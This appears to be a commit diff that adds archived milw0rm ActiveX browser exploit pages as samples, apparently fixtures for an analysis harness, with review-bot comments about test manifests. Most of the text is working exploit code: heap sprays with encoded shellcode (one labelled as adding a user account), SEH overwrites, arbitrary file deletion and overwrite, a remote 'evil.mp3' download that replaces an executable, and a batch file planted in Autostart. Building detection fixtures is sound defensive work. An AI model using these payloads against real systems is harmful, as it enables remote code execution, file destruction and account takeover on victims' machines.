+ "%u3458%u7473%u4272%u5448%u3237%u3453%u7372%u426f%u6b74%u7a4f%u7070%u5868%u584b%u4b6d" +
+ "%u774c%u304b%u4b50%u5a4f%u5376%u6d6f%u4b59%u6355%u4f56%u6a71%u534d%u3438%u6642%u7235" +
+ "%u444a%u3942%u386f%u5050%u6e68%u6439%u4b49%u6e45%u304d%u4b57%u494f%u5346%u3063%u6353" +
+ "%u3663%u5333%u3163%u5153%u3043%u3343%u4b63%u4a4f%u5070%u7166%u4978%u526d%u434c%u5656" +
+ "%u4c33%u4d49%u6e31%u5075%u4c68%u3464%u505a%u6f70%u4637%u3937%u4e6f%u7036%u746a%u4350" +
+ "%u7661%u7935%u586f%u6150%u6d78%u4e74%u764d%u6d4e%u5239%u7977%u4e6f%u3336%u3363%u4965" +
+ "%u4a6f%u5370%u4958%u3775%u4e39%u7066%u4649%u4b37%u4e4f%u6636%u7630%u6634%u6634%u6935" +
+ "%u486f%u7a50%u4233%u3948%u7077%u7879%u3146%u5069%u3957%u6b6f%u5366%u6965%u686f%u6550" +
+ "%u7336%u655a%u7034%u3166%u5178%u7273%u6f4d%u6d79%u3135%u427a%u6670%u4139%u5839%u6e4c" +
+ "%u4869%u7367%u735a%u6e74%u6a69%u3742%u3941%u3850%u6c73%u4b6a%u774e%u4432%u4b6d%u474e" +
+ "%u6432%u6d6c%u6e43%u706d%u307a%u6c38%u6c6b%u4e6b%u634b%u7058%u4b72%u4e4e%u5653%u4b76" +
+ "%u4869%u7367%u735a%u6e74%u6a69%u3742%u3941%u3850%u6c73%u4b6a%u774e%u4432%u4b6d%u474e" +
+ "%u6432%u6d6c%u6e43%u706d%u307a%u6c38%u6c6b%u4e6b%u634b%u7058%u4b72%u4e4e%u5653%u4b76" +
+ "%u424f%u3055%u5944%u796f%u6346%u706b%u7257%u7272%u4671%u5031%u3251%u644a%u7041%u3251" +
+ "%u4171%u4645%u3931%u6a6f%u6370%u4c58%u6e6d%u5739%u5875%u434e%u4963%u6b6f%u5166%u4b7a" +
+ "%u6b4f%u754f%u6967%u686f%u4e50%u366b%u3937%u4c6c%u3843%u5044%u4964%u5a6f%u4676%u4932" +
+ "%u7a6f%u7570%u6c38%u6e30%u456a%u7154%u464f%u6b33%u4e4f%u6b36%u6e4f%u6230");
+ var heapSprayToAddress = 0x05050505; // Spray up to this address
+ var heapBlockSize = 0x400000; // Size of the blocks we want to create
+ var heapHdrSize = 0x38; // The size of the header of heap blocks in MSIE
+ var payLoadSize = ShellCode.length * 2; // Size of the shellcode (convert dwords to bytes)
+ var spraySlideSize = heapBlockSize - (payLoadSize + heapHdrSize); // Size of the nopslide
+ var spraySlide = unescape("%u4141%u4141"); // NOP Slide filled with 0x41 ( inc ecx)
+ var heapBlocks = (heapSprayToAddress - 0x400000) / heapBlockSize; // Number of heap blocks
+
+ spraySlide = getSpraySlide(spraySlide, spraySlideSize);
+
+ // We are going to create large blocks that will contain:
+ // [heap header][nopslide...........................][shellcode]
+ memory = new Array();
+ for (k = 0; k < heapBlocks; k++)
+ memory[k] = spraySlide + ShellCode;
+
+ // Create the Target string
+ while(Target.length < PwnEIP)
+ Target += "A";
+ Target += Ninja;
+
+ // Exploit !
+ NeoTracePro.TraceTarget(Target);
+ }
+
+ function getSpraySlide(spraySlide, spraySlideSize){
+ // The quickest way to create large blocks of memory is doubling their size untill they are
+ // big enough (or too big, in which case we cut them back to size.)
+ while(spraySlide.length * 2 < spraySlideSize)
+ spraySlide += spraySlide;
+
+ spraySlide = spraySlide.substring(0, spraySlideSize / 2);
+
+ return spraySlide;
+ }
+ </script>
+ </center>
+ </body>
+</html>
+
+# milw0rm.com [2007-07-07]
40 samples/exploits/4226.html
@@ -0,0 +1,40 @@
+<pre>
+<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------
+ <b>Clever Internet ActiveX Suite 6.2 (CLINETSUITEX6.OCX) Arbitrary file download/overwrite Exploit</b>
+ url: http://www.clevercomponents.com/home/news.asp
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ <b>This control is marked as
+ RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller, data
+ IPStorage Safe: Safe for untrusted: caller,data</b>
+
+ Using the "GetToFile" method, you can download everything you want on a pc. This
+ exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
+-------------------------------------------------------------------------------------------------
+
+<object classid='clsid:E8F92847-7C21-452B-91A5-49D93AA18F30' id='test' ></object>
+
+<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
+
+<script language='vbscript'>
+Sub tryMe()
+
+ test.GetToFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\windows\system32\shinnai.txt"
+ MsgBox("Exploit completed!")
+
+End Sub
+</script>
+
+</span>
+</code></pre>
+
+# milw0rm.com [2007-07-25]
19 samples/exploits/4230.html
@@ -0,0 +1,19 @@
+<HTML>
+<!--
+Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit
+Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
+Just for fun ;]
+-->
+
+<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
+
+<script language="javascript">
+obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
+alert("done");
+</script>
+</HTML>
+
+# milw0rm.com [2007-07-26]
+
+
17 samples/exploits/4237.html
@@ -0,0 +1,17 @@
+<HTML>
+<!--
+Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
+Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
+Just for fun ;]
+-->
+
+<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
+
+<script language="javascript">
+obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
+obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
+</script>
+</HTML>
+
+# milw0rm.com [2007-07-27]
50 samples/exploits/4250.html
@@ -0,0 +1,50 @@
+<html>
+<!--
++++++++++++++++++++++++
++Last Modified by lhoang8500++
++++++++++++++++++++++++
+-->
+<html>
+<object classid="clsid:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>
+
+<SCRIPT language="javascript">
+
+ var heapSprayToAddress = 0x05050505;
+
+ var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");
+
+ var heapBlockSize = 0x400000;
+
+ var payLoadSize = payLoadCode.length * 2;
+
+ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+
+ var spraySlide = unescape("%u9090%u9090");
+ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+
+ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+
+ memory = new Array();
+
+ for (i=0;i<heapBlocks;i++)
+ {
+ memory[i] = spraySlide + payLoadCode;
+ }
+ function getSpraySlide(spraySlide, spraySlideSize)
+ {
+ while (spraySlide.length*2<spraySlideSize)
+ {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+ };
+var buffer = unescape("%u0505");
+while (buffer.length < 845) buffer+='\x0A';
+while (buffer.length< 1000) buffer+=unescape("%u0505");
+
+target.GetComponentVersion(buffer);
+</script>
+</html>
+
+# milw0rm.com [2007-07-31]
49 samples/exploits/4351.html
@@ -0,0 +1,49 @@
+<!--
+Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX Control Buffer Overflows
+
+update YM : http://messenger.yahoo.com/security_update.php?id=082907
+
+Functions : fvcom or info;
+RegKey Safe for Script: True
+RegKey Safe for Init: True
+-> that functions are safely scriptable and exploitable by HeapSpray Technique
+
+Tested : Windows XP Professional SP2 all patched,Internet Explorer 7
+
+That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -> I used "Simple DNS Plus" for manipulating the DNS resolution.
+
+I saved this file (exploit.htm) into directory root (web server)
+and I exploited with link : http://www.yahoo.com/exploit.htm
+
+coder : minhbq
+ mail : minhbq1985@gmail.com
+-->
+
+
+<html>
+<!-- CLSID of YverInfo.dll -->
+<object classid="CLSID:D5184A39-CBDF-4A4F-AC1A-7A45A852C883" id="target"></OBJECT>
+
+<SCRIPT language="javascript">
+// HeapSpray - execute calculator
+ shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+ bigblock = unescape("%u9090%u9090");
+ headersize = 20;
+ slackspace = headersize+shellcode.length
+ while (bigblock.length<slackspace) bigblock+=bigblock;
+ fillblock = bigblock.substring(0, slackspace);
+ block = bigblock.substring(0, bigblock.length-slackspace);
+ while(block.length+slackspace<0x40000) block = block+block+fillblock;
+ memory = new Array();
+ for (i=0;i<800;i++) memory[i] = block + shellcode;
+
+ var buffer = unescape("%0D");
+ while (buffer.length< 10000) buffer+=unescape("%0D");
+
+// Vulnerability of method fvcom
+ target.fvcom(buffer);
+
+</script>
+</html>
+
+# milw0rm.com [2007-09-01]
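Review bot: The header on L1399 states that the control only responds when it believes it is being run from the yahoo.com domain, so when this sample is loaded from a local path or any other origin the `target.fvcom(buffer)` call on L1430 may be inert and the fixture exercises nothing beyond the heap spray. The expected analyzer outcome for this sample (a detection from the spray alone, or a negative result) should be written down with the sample so a future regression can be told apart from the origin gate.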
56 samples/exploits/4420.html
@@ -0,0 +1,56 @@
+<pre>
+<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
+ <b>MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite</b>
+ url: www.mw6tech.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ <b>Description:
+ This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
+ write to a file specified as an argument.
+ These can be exploited to overwrite and corrupt arbitrary files on the
+ system in the context of the currently logged-on user.
+
+ Marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller,data
+ IPersist Safe: Safe for untrusted: caller,data
+ IPStorage Safe: Safe for untrusted: caller,data
+ KillBitSet: Falso</b>
+-----------------------------------------------------------------------------
+<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test' width='24' height='24'></object>
+
+<select style="width: 404px" name="Pucca">
+ <option value = "SaveAsBMP">SaveAsBMP</option>
+ <option value = "SaveAsWMF">SaveAsWMF</option>
+
+</select>
+
+<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
+
+<script language='vbscript'>
+ Sub tryMe
+ on error resume next
+ Dim MyMsg
+ if Pucca.value = "SaveAsBMP" then
+ test.SaveAsBMP "c:\windows\system_.ini"
+ MsgBox "Exploit completed."
+ elseif Pucca.value = "SaveAsWMF" then
+ test.SaveAsWMF "c:\windows\system_.ini"
+ MsgBox "Exploit completed."
+ end if
+ End Sub
+</script>
+</span></span>
+</code></pre>
+
+# milw0rm.com [2007-09-18]
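Review bot: The scriptable part of this sample is VBScript (`<script language='vbscript'>` on L1477), as is 4226.html (L1280); these two fixtures therefore go through a different code path from the JavaScript samples, and whether the analyzer handles VBScript at all is not stated anywhere in the commit. Documenting which script language each sample targets and the expected result would let a VBScript sample that yields no detection be recognised as a coverage gap rather than a pass.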
29 samples/exploits/4427.html
@@ -0,0 +1,29 @@
+<HTML>
+<!--
+jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
+Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+Tested on:..
+- jetAudio 7.0.3 Basic
+- Microsoft Internet Explorer 6
+Just for fun ;)
+-->
+
+<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>
+
+<script>
+var target = "DownloadFromMusicStore";
+//>rename evil.exe evil.mp3
+var url = "http://192.168.0.1/evil.mp3";
+var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
+var title = "0day";
+var artist = "h07";
+var album = "for fun";
+var genere = "exploit";
+var size = 256;
+var param1 = 0;
+var param2 = 0;
+obj[target](url, dst, title, artist, album, genere, size, param1, param2);
+</script>
+</HTML>
+
+# milw0rm.com [2007-09-19]
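Review bot: Nothing in this commit records what the analysis harness is expected to produce for this fixture, so a regression in CLSID or method detection on 4427.html would pass silently; the same gap applies to the other samples/exploits sections here (4594, 4613, 4663, 4829, 4869, 4874, 4875, 4894, 4903, 4909, 4918). A short manifest next to the samples, listing per file the source already given in the trailing `# milw0rm.com [...]` line, the CLSID or ProgID the page instantiates (here `clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8`) and the method invocation the harness should log (here `DownloadFromMusicStore`), would turn these loose files into regression tests. The manifest should also flag which samples carry external references such as the `http://192.168.0.1/evil.mp3` URL on this page and the `.cab` codebase in 4932.html, so a test run can be kept offline and the references are never fetched by accident.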
44 samples/exploits/4594.html
@@ -0,0 +1,44 @@
+<!--
+
+SonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.
+
+by krafty
+
+greets to SK, muts, halvar, grugq, and all the ethnical hackers
+
+sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
+
+Bring back the days of technotronic and r00tshell! Freedom.
+
+poc: launches calculator.
+Tested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all
+that jing-bang.
+
+-->
+
+
+<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>
+
+<script>
+
+var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
+
+var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
+do {
+ spray += spray;
+} while(spray.length < 0xc0000);
+
+memory = new Array();
+
+for(i = 0; i < 50; i++)
+ memory[i] = spray + shellcode;
+
+buf = "";
+for(i = 0; i < 50; i++)
+ buf += unescape("%05%05%05%05");
+
+nelx.AddRouteEntry("", buf);
+
+</script>
+
+# milw0rm.com [2007-11-01]
20 samples/exploits/4613.html
@@ -0,0 +1,20 @@
+<html>
+ <head>
+ <script language="JavaScript" DEFER>
+ function Check() {
+ var s = "AAAA";
+ while (s.length < 768 * 768) s=s+s;
+
+ var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}
+
+ obj.ShockwaveVersion(s);
+ }
+ </script>
+
+ </head>
+ <body onload="JavaScript: return Check();" />
+</html>
+
+# milw0rm.com [2007-11-08]
+
+
59 samples/exploits/4663.html
@@ -0,0 +1,59 @@
+<html>
+
+
+<object classid='clsid:5D86DDB5-BDF9-441B-9E9E-D4730F4EE499' id='BD'>
+</object>
+
+<script language="javascript">
+
+
+SCPL = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
+"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
+"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
+"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
+"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
+"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
+"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
+"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
+"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
+"%uCC4A%uD0FF");
+
+MemContent = unescape("%u0606");
+
+HSize = 20;
+
+FreeSpace = HSize+SCPL.length
+
+while (MemContent.length<FreeSpace)
+{
+ MemContent+=MemContent;
+}
+
+FB = MemContent.substring(0, FreeSpace);
+
+Mem = MemContent.substring(0, MemContent.length-FreeSpace);
+
+while(Mem.length+FreeSpace<0x60000)
+{
+ Mem = Mem+Mem+FB;
+}
+
+memory = new Array();
+
+for (x=0;x<600;x++) memory[x] = Mem + SCPL;
+
+var SiteAuthority = '%%';
+
+while (SiteAuthority.length < 60000)
+{
+ SiteAuthority+='\x30\x36\x30\x36';
+}
+
+BD.initx(SiteAuthority);
+
+</script>
+</html>
+
+# milw0rm.com [2007-11-27]
39 samples/exploits/4829.html
@@ -0,0 +1,39 @@
+<object id="divx" classid="clsid:D050D736-2D21-4723-AD58-5B541FFB6C11" style="display:none;">
+</object>
+
+<script>
+function crash() {
+var buff = '';
+for(i=0;i<=500;i++) {buff+="AAAAAAAAAA";}
+
+object = document.getElementById("divx");
+// modified by jose@
+divx.SetPassword(buff);
+}
+</script>
+
+<pre>
+<h3><u>DivX SetPassword (npUpload.dll) Denial of Service</u></h3>
+<b>Tested on IE 7 and Divx Player 6.6.0</b>
+
+<b>Registers:</b>
+
+EAX 00000000
+ECX FFFFFFFF
+EDX 0191CA50
+EBX 008E06E0
+ESP 0191C9E4
+EBP 0191CA50
+ESI 00000000
+EDI 00000000
+EIP 061F2B52 npUpload.061F2B52
+
+Access violation when reading [00000000]...
+
+
+<i>Discovered by shir, 02/01/2007</i>
+
+<a href="javascript:;" OnClick="crash()">Crash...</a>
+</pre>
+
+# milw0rm.com [2008-01-02]
30 samples/exploits/4869.html
@@ -0,0 +1,30 @@
+<!--
+Gateway Weblaunch ActiveX Control Insecure Method Exploit
+Implemented Categories:
+Category: Safe for Initialising
+Category: Safe for Scripting
+Written by e.b.
+Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
+This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
+-->
+<html>
+ <head>
+ <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
+ <script language="JavaScript" defer>
+ function Check() {
+
+ //escape from systemdrive\documents and settings\username\local settings\temp
+ obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
+
+ }
+
+ </script>
+ </head>
+ <body onload="JavaScript: return Check();">
+ <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
+ Unable to create object
+ </object>
+ </body>
+</html>
+
+# milw0rm.com [2008-01-08]
44 samples/exploits/4874.html
@@ -0,0 +1,44 @@
+<pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
+ <b>Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method</b>
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ <b><font color='red'>This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.</font></b>
+
+ <b>Technical details:</b>
+ File: RICHTX32.OCX
+ ver.: 6.1.97.82
+
+ While this GUID <b>{3B7C8860-D78F-101B-B9B5-04021C009402}</b> is
+ killbited, this one <b><font color='green'>{B617B991-A767-4F05-99BA-AC6FCABB102E}</font></b>
+
+ works fine so it is possible, using the "SaveFile()" method,
+ to save the content of the rich textbox on a user's pc.
+ This can be used to save, overwrite and/or corrupt arbitrary
+ files on the system.
+
+ It's marked as:
+ <b>RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IPersist Safe: Safe for untrusted: caller,data
+ IPStorage Safe: Safe for untrusted: caller,data</b>
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+<object classid='clsid:B617B991-A767-4F05-99BA-AC6FCABB102E' id='test' style='width: 250px; height: 75px'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
+<script language='vbscript'>
+ Sub tryMe
+ test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause"
+ test.SaveFile "C:\shinnai.bat", 1
+ MsgBox "Exploit completed!"
+ End Sub
+</script></span><span></code></pre>
+
+# milw0rm.com [2008-01-09]
+
+
33 samples/exploits/4875.html
@@ -0,0 +1,33 @@
+<pre>
+<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
+ <b>Microsoft VFP_OLE_Server Remote Command Execution</b>
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ <b><font color='red'>This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.</font></b>
+
+ Not much more to say than using "foxcommand()" function, you can
+ run applications passed as argument.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+<object classid='clsid:A7CD2320-6117-11D7-8096-0050042A4CD2' id='test'></object>
+
+<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
+
+<script language='vbscript'>
+ Sub tryMe
+ test.foxcommand "RUN calc.exe"
+ End Sub
+</script>
+
+</span></span>
+</code></pre>
+
+# milw0rm.com [2008-01-09]
+
+
71 samples/exploits/4894.html
@@ -0,0 +1,71 @@
+<!--
+StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit
+Written by e.b.
+Shellcode is limited to about 680 bytes
+Tested on Windows XP SP2(fully patched) English, IE6, ccpm_0237.dll 3.0.0.237
+Thanks to h.d.m. and the Metasploit crew
+-->
+<html>
+ <head>
+ <title>StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit</title>
+ <script language="JavaScript" defer>
+ function Check() {
+
+ var buf = 'A';
+ while (buf.length <= 242) buf = buf + 'A';
+
+
+// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
+var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
+ "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
+ "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
+ "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
+ "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
+ "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
+ "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
+ "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
+ "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
+ "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
+ "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
+ "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
+ "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
+ "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
+ "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
+ "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
+ "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
+ "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
+ "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
+ "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
+ "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
+ "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
+ "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
+ "%4e%31%75%74%38%70%65%77%70%43");
+
+
+ var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
+
+
+ //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis
+ //no SafeSEH
+ var seh_handler = unescape("%50%69%C9%74");
+
+ var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");
+
+ var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop;
+
+ obj.InternalTuneIn(m, "", 0, 0, 0);
+
+ }
+
+ </script>
+ </head>
+ <body onload="JavaScript: return Check();">
+ <object id="obj" classid="clsid:2253F320-AB68-4A07-917D-4F12D8884A06" height="0" width="0">
+ Unable to create object
+ </object>
+ </body>
+</html>
+
+# milw0rm.com [2008-01-11]
+
+
31 samples/exploits/4903.html
@@ -0,0 +1,31 @@
+<!--
+NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) remote heap
+overflow exploit (IE7/XP SP2)
+
+check a camera demo here: http://www.2mcctv.com/2mdemo.php
+codebase: http://www.dvrstation.com/pdvratl.php?vendor=0
+
+rgod /////////////////////////////// http://retrogod.altervista.org
+-->
+<html>
+<script language="javascript">
+//add su one, user: sun pass: tzu
+shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%